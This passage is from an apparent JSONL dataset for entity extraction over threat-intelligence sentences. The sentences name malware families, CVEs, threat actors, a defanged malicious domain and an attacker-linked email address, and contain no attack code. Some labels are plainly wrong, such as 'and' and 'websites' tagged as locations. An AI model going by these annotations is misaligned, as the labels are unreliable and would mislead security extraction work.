document, while the other one is for the payload.","entities":[],"relations":[],"Comments":[]} +{"id":5410,"text":"Based on our previous analysis of VPNFilter, we assumed that there were more vendors being attacked by this group.","entities":[{"id":51404,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} +{"id":11763,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":36276,"label":"attack-pattern","start_offset":5,"end_offset":11},{"id":36278,"label":"location","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} +{"id":7766,"text":"Lastly, this new FlawedAmmyy downloader overwrites some PE header members with random values.","entities":[{"id":24084,"label":"malware","start_offset":17,"end_offset":28}],"relations":[],"Comments":[]} +{"id":2315,"text":"To verify this hypothesis, we ran git bisect and determined it was fixed in this commit.","entities":[],"relations":[],"Comments":[]} +{"id":1449,"text":" Losing control of a certificate\u2019s private key, or using an insecure private key, can have severe security consequences.","entities":[],"relations":[],"Comments":[]} +{"id":8223,"text":" The use of tax-related scams is something we\u2019ve seen before.","entities":[],"relations":[],"Comments":[]} +{"id":938,"text":"We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.","entities":[],"relations":[],"Comments":[]} +{"id":3139,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} +{"id":6240,"text":"To avoid XSS attacks similar to what we described in this report, we recommend adapting Contant-Security-Policy (CSP) for websites.","entities":[{"id":19252,"label":"attack-pattern","start_offset":9,"end_offset":12},{"id":19253,"label":"location","start_offset":96,"end_offset":104}],"relations":[],"Comments":[]} +{"id":14127,"text":"Having that reference, we plotted the actions of all users whose information we could obtain.","entities":[],"relations":[],"Comments":[]} +{"id":1834,"text":"and","entities":[],"relations":[],"Comments":[]} +{"id":6695,"text":"Generally, 2020 has been dominated by COVID-19.","entities":[],"relations":[],"Comments":[]} +{"id":667,"text":"Office applications have a built-in script engine that can run VBA (Visual Basic for Applications) scripts.","entities":[{"id":46245,"label":"SOFTWARE","start_offset":63,"end_offset":98}],"relations":[],"Comments":[]} +{"id":4356,"text":"It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.","entities":[{"id":50138,"label":"attack-pattern","start_offset":65,"end_offset":79},{"id":50139,"label":"DOMAIN","start_offset":108,"end_offset":133},{"id":50140,"label":"threat-actor","start_offset":161,"end_offset":170}],"relations":[{"id":919,"from_id":50139,"to_id":50140,"type":"attributed-to"}],"Comments":[]} +{"id":1865,"text":"Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations\u2019 networks.","entities":[{"id":5474,"label":"malware","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} +{"id":2051,"text":"Domains linked to tebya@poime.li Some of them historically resolved to some malicious IPs, which led us to discover additional infrastructure and malware being hosted in other domains (Table 3).","entities":[{"id":47140,"label":"EMAIL","start_offset":18,"end_offset":32}],"relations":[],"Comments":[]} +{"id":1407,"text":"Subject: Hearing of your case in Court","entities":[],"relations":[],"Comments":[]} +{"id":7996,"text":"During the pandemic, we also uncovered attackers posing as news providers with a \u201cCovid19 news software.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":10044,"text":"Code snippet of unobfuscated rsync","entities":[],"relations":[],"Comments":[]} +{"id":4588,"text":"DEVCORE reported two of the four zero-days (CVE-2021-26855 and CVE-2021-27065) to Microsoft Security Response Center (MSRC).","entities":[{"id":50447,"label":"identity","start_offset":0,"end_offset":7},{"id":50448,"label":"vulnerability","start_offset":44,"end_offset":58},{"id":50449,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":50450,"label":"identity","start_offset":82,"end_offset":123}],"relations":[],"Comments":[]} +{"id":13465,"text":"On any given day, Google's Threat Analysis Group (TAG) is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[],"relations":[],"Comments":[]} +{"id":1346,"text":"A day later, public reporting outlined new malware called WhisperGate that originally was observed on Jan. 13, 2022.","entities":[{"id":46675,"label":"TIME","start_offset":102,"end_offset":115},{"id":46676,"label":"malware","start_offset":58,"end_offset":69}],"relations":[],"Comments":[]}